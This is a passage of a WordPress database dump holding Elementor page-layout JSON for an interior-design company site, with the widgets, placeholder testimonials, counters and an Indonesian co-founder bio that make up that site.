esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or WhatsApp: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"0822 9777 5589\",\"phone_address\":\"082297775589\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3929,4879,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3930,4879,'_elementor_pro_version','3.8.1'),(3931,4880,'_wp_page_template','elementor_header_footer'),(3932,4880,'_elementor_edit_mode','builder'),(3933,4880,'_elementor_template_type','wp-page'),(3934,4880,'_elementor_version','3.8.1'),(3935,4880,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"John Alan\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.<\\/p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/john_allan.jpg\",\"id\":4839,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center 